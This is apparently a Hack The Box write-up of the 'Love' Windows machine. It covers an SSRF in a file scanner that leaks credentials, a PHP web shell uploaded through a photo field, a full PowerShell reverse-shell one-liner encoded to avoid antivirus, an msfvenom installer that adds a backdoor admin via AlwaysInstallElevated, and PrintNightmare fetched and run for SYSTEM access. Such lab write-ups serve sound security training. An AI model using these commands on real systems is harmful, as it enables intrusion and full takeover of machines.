Love from Hack The Box hosts a voting system application and an online file scanner. The file scanner is vulnerable to SSRF, which can be exploited to leak a set of credentials that can be used to login into the voting app. The photo upload functionality can be leveraged to drop a web shell, which is then used to gain interactive shell access on the machine. Enumeration of the system reveals that AlwaysInstallElevated is enabled, and this can be leveraged to install a malicious .msi installer and get SYSTEM access.

Skills Learned

  • SSRF
  • Abusing Windows AlwaysInstallElevated
  • (Alternative) PrintNightmare LPE


  • Nmap
  • Burp Suite
  • WinPEAS
  • msfvenom



A full TCP scan scan discovers a bunch of open ports.

→ kali@kali «love» «» 
$ fscan love
nmap -p- --min-rate=1000 | grep '^[0-9]' | cut -d '/' -f1 | tr '\n' ',' | sed 's/,$//'
nmap -p80,135,139,443,445,3306,5000,5040,5985,5986,7680,47001,49664,49665,49666,49667,49668,49669,49670 -sC -sV -oA nmap/10-tcp-allport-love
Starting Nmap 7.91 ( ) at 2021-08-08 11:29 EDT
Nmap scan report for
Host is up (0.087s latency).

80/tcp    open  http         Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27)
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: Voting System using PHP
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
443/tcp   open  ssl/http     Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
| ssl-cert: Subject:
| Not valid before: 2021-01-18T14:00:16
|_Not valid after:  2022-01-18T14:00:16
|_ssl-date: TLS randomness does not represent time
| tls-alpn: 
|_  http/1.1
445/tcp   open  microsoft-ds Windows 10 Pro 19042 microsoft-ds (workgroup: WORKGROUP)
3306/tcp  open  mysql?
| fingerprint-strings: 
|   GetRequest, HTTPOptions, Help, JavaRMI, Kerberos, NULL, NotesRPC, RPCCheck, RTSPRequest, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServerCookie, WMSRequest, oracle-tns: 
|_    Host '' is not allowed to connect to this MariaDB server
5000/tcp  open  http         Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: 403 Forbidden
5040/tcp  open  unknown
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
5986/tcp  open  ssl/http     Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
| ssl-cert: Subject: commonName=LOVE
| Subject Alternative Name: DNS:LOVE, DNS:Love
| Not valid before: 2021-04-11T14:39:19
|_Not valid after:  2024-04-10T14:39:19
|_ssl-date: 2021-08-08T15:53:52+00:00; +21m37s from scanner time.
| tls-alpn: 
|_  http/1.1
7680/tcp  open  pando-pub?
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc        Microsoft Windows RPC
49665/tcp open  msrpc        Microsoft Windows RPC
49666/tcp open  msrpc        Microsoft Windows RPC
49667/tcp open  msrpc        Microsoft Windows RPC
49668/tcp open  msrpc        Microsoft Windows RPC
49669/tcp open  msrpc        Microsoft Windows RPC
49670/tcp open  msrpc        Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at :
Service Info: Hosts:, LOVE,; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 2h06m37s, deviation: 3h30m01s, median: 21m36s
| smb-os-discovery: 
|   OS: Windows 10 Pro 19042 (Windows 10 Pro 6.3)
|   OS CPE: cpe:/o:microsoft:windows_10::-
|   Computer name: Love
|   NetBIOS computer name: LOVE\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2021-08-08T08:53:41-07:00
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-08-08T15:53:43
|_  start_date: N/A

Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 137.03 seconds

Most notable services are:

  • An Apache web server that handles 3 websites on port 80, 443, and 5000 (this one is forbidden).
  • SMB on port 445, good start.
  • A MySQL server on port 3306, I will stay away from this for now because IP block
  • WinRM on 5985/6, I will use this for lateral movement if I have creds.

Seeing Apache and MySQL on a Windows host, I can assume that this machine uses XAMPP.

Nmap also identified two hostnames: and I will add these to my /etc/hosts.

→ root@kali «love» «» 
$ sudo echo '' >> /etc/hosts


TCP 445 - SMB

Anonymous login is not allowed here, I will re-visit this later when I have creds.

→ root@kali «love» «» 
$ smbclient -N -L // 
session setup failed: NT_STATUS_ACCESS_DENIED

TCP 5000

Visiting this port results in a 403 Forbidden message error.


TCP 80 - Website

Visiting port 80 with the IP or the hostname returns the same content.

→ kali@kali «love» «» 
$ for i in; do echo -n "$i "; curl -s $i | wc -c; done              4388 4388

On the browser, the site displays a login form of a Voting System app.


Trying some random IDs and common passwords didn’t work here.



Gobuster discovers a bunch of directories, but one that stands out is /admin.

→ kali@kali «love» «» 
$ gobuster dir -f -u -w /opt/SecLists/Discovery/Web-Content/raft-small-directories-lowercase.txt -x txt,php -o gobuster/gobuster-S-80 -t 40                                                                                                                                                           
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
[+] Url:           
[+] Method:                  GET
[+] Threads:                 40
[+] Wordlist:                /opt/SecLists/Discovery/Web-Content/raft-small-directories-lowercase.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              txt,php
[+] Add Slash:               true
[+] Timeout:                 10s
2021/08/08 13:16:14 Starting gobuster in directory enumeration mode
/cgi-bin/             (Status: 403) [Size: 302]
/admin/               (Status: 200) [Size: 6198]
/includes/            (Status: 200) [Size: 2261]
/plugins/             (Status: 200) [Size: 2490]
/images/              (Status: 200) [Size: 2719]
/logout.php           (Status: 302) [Size: 0] [--> index.php]
/login.php            (Status: 302) [Size: 0] [--> index.php]
/webalizer/           (Status: 403) [Size: 302]              
/home.php             (Status: 302) [Size: 0] [--> index.php]
/index.php            (Status: 200) [Size: 4388]             
/phpmyadmin/          (Status: 403) [Size: 302]              
/icons/               (Status: 200) [Size: 74798]            
/preview.php          (Status: 302) [Size: 0] [--> index.php]
/examples/            (Status: 503) [Size: 402]              
/dist/                (Status: 200) [Size: 1389]             
/tcpdf/               (Status: 200) [Size: 2710]             
/licenses/            (Status: 403) [Size: 421]              
/server-status/       (Status: 403) [Size: 421]              
/con.php              (Status: 403) [Size: 302]              
/con/                 (Status: 403) [Size: 302]              
/con.txt              (Status: 403) [Size: 302]              
/aux/                 (Status: 403) [Size: 302]              
/aux.php              (Status: 403) [Size: 302]              
/aux.txt              (Status: 403) [Size: 302]              
2021/08/08 13:18:01 Finished


When I visit /admin, the page presents the same login form. But this time, instead of voter’s ID, it uses username.


Submitting several credentials only reveals that admin is a valid username here.

TCP 80 -

On, the site provides an online file scanner.


The “Demo” menu points to /beta.php, and it allows visitor to insert a URL there.


While having my netcat listener in listening mode, I entered my HTB IP there, and my listener received the following request.

→ kali@kali «love» «» 
$ nc -nvlp 80
listening on [any] 80 ...
connect to [] from (UNKNOWN) [] 49806
GET /iamf HTTP/1.1
Accept: */*

Based on the received request, I’m guessing the request was crafted using PHP curl. If the user agent contains “WindowsPowerShell”, I’m going to use Responder to see if I can steal the NTLMv2 response.

Playing a bit with it reveals that it can render HTML.


The key take away from here is that can make a HTTP request.

TCP 443 - Website

On HTTPS, the SSL certificate leaks an email address and a potential username: roy@love.htb.


And both the HTTPS versions of and return the Forbidden message error.




Shell as phoebe


The behavior of the file scanner on making a HTTP (not always) request can be abused to access internal resources that previously were inaccessible due to IP restrictions. This attack is often referred as Server-Side Request Forgery (SSRF).

When I submit file:///C:/xampp/apache/conf/extra/httpd-vhosts.conf, it returns the virtual host configuration file.


The string “C:/xampp/htdocs/passwordmanager” immediately draws my attention. Based on that config, the service on port 5000 is a password manager, and the access is limited to only allow connections from

Assuming there is an index file, I try to submit file:///C:/xampp/htdocs/passwordmanager/index.php , and the file is exist.


Now if I submit file:///C:/xampp/htdocs/passwordmanager/creds.txt, it returns the following:


Alternatively, I can just visit and the file scanner will render the page of password manager, in which contains the admin credentials.


I can use that creds to access the admin dashboard.


PHP webshell

On admin/voters.php, there is a photo upload feature.


I will intercept the request to modify the photo section to a PHP web shell and then send it afterwards. It gets uploaded smoothly.


When I reload the page, I see the voter I added is there with broken photo, and that because it loads my PHP web shell as image.


The uploaded web shell is accessible at, and now I have code execution as phoebe.


Interactive shell access

To get an interactive shell I will use a PowerShell one-liner reverse shell.

→ kali@kali «love» «» 
$ cat exploits/revshell.ps1
$client = New-Object System.Net.Sockets.TCPClient('',53);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

Because it is a Windows machine, I will encoded it with base64 to avoid AV.

→ kali@kali «love» «» 
$ cat exploits/revshell.ps1| iconv -t UTF-16LE| base64 -w0


On my listener.

→ kali@kali «love» «» 
$ rlwrap nc -nvlp 53
listening on [any] 53 ...
connect to [] from (UNKNOWN) [] 49950

PS C:\xampp\htdocs\omrs\images>

The user flag is done here.

PS C:\Users\Phoebe\Desktop> dir

    Directory: C:\Users\Phoebe\Desktop

Mode                 LastWriteTime         Length Name                                                                 
----                 -------------         ------ ----                                                                 
-ar---          8/8/2021   3:50 AM             34 user.txt                                                             

PS C:\Users\Phoebe\Desktop> type user.txt

The flag also accessible using SSRF.


Privilege Escalation

Shell as SYSTEM


WinPEAS finds that AlwaysInstallElevated is set to 1. This means installation of an app always runs in elevated mode (SYSTEM), and it can be abused to install a malicious .msi package.

[+] Checking AlwaysInstallElevated
    AlwaysInstallElevated set to 1 in HKLM!
    AlwaysInstallElevated set to 1 in HKCU!

Exploitation - Malicious .msi Installer

I will generate a malicious .msi that will add a user with administrative access using msfvenom

→ kali@kali «exploits» «» 
$ msfvenom -p windows/adduser USER=iamf PASS=P@ssword123! -f msi -o iamf.msi
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 270 bytes
Final size of msi file: 159744 bytes
Saved as: iamf.msi

I will host the .msi using Python web server.

On Love, I will grab the msi and install the package immediately.

PS C:\Users\Public> curl.exe -O
PS C:\Users\Public> msiexec /quiet /qn /i iamf.msi
PS C:\Users\Public> net user

User accounts for \\LOVE                                                                                                                                                   
Administrator            DefaultAccount           Guest                                                                                                                    
iamf                     Phoebe                   WDAGUtilityAccount                                                                                                       
The command completed successfully.                                                                                                                                        

PS C:\Users\Public> 

Psexec - SYSTEM

I can login using my backdoor user with help of

→ root@kali «exploits» «» 
$ love/iamf:'P@ssword123!'@                                            
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[*] Requesting shares on
[*] Found writable share ADMIN$
[*] Uploading file VlzRTIEE.exe
[*] Opening SVCManager on
[*] Creating service lRbn on
[*] Starting service lRbn.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.19042.867]
(c) 2020 Microsoft Corporation. All rights reserved.

nt authority\system

(Alternative) PrintNightmare

Love also vulnerable to LPE PrintNightmare.

PS C:\Users\Phoebe\Downloads> Get-Service -name spooler

Status   Name               DisplayName
------   ----               -----------
Running  spooler            Print Spooler
PS C:\Users\Phoebe\Downloads> curl.exe -O
PS C:\Users\Phoebe\Downloads> Import-Module .\CVE-2021-1675.ps1
PS C:\Users\Phoebe\Downloads> Invoke-Nightmare
PS C:\Users\Phoebe\Downloads> net user

User accounts for \\LOVE

adm1n                    Administrator            DefaultAccount           
Guest                    iamf                     Phoebe                   
The command completed successfully.

I can login via WinRM.

→ kali@kali «love» «» 
$ evil-winrm -i -u 'adm1n' -p'P@ssw0rd'

Evil-WinRM shell v2.4

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\adm1n\Documents> hostname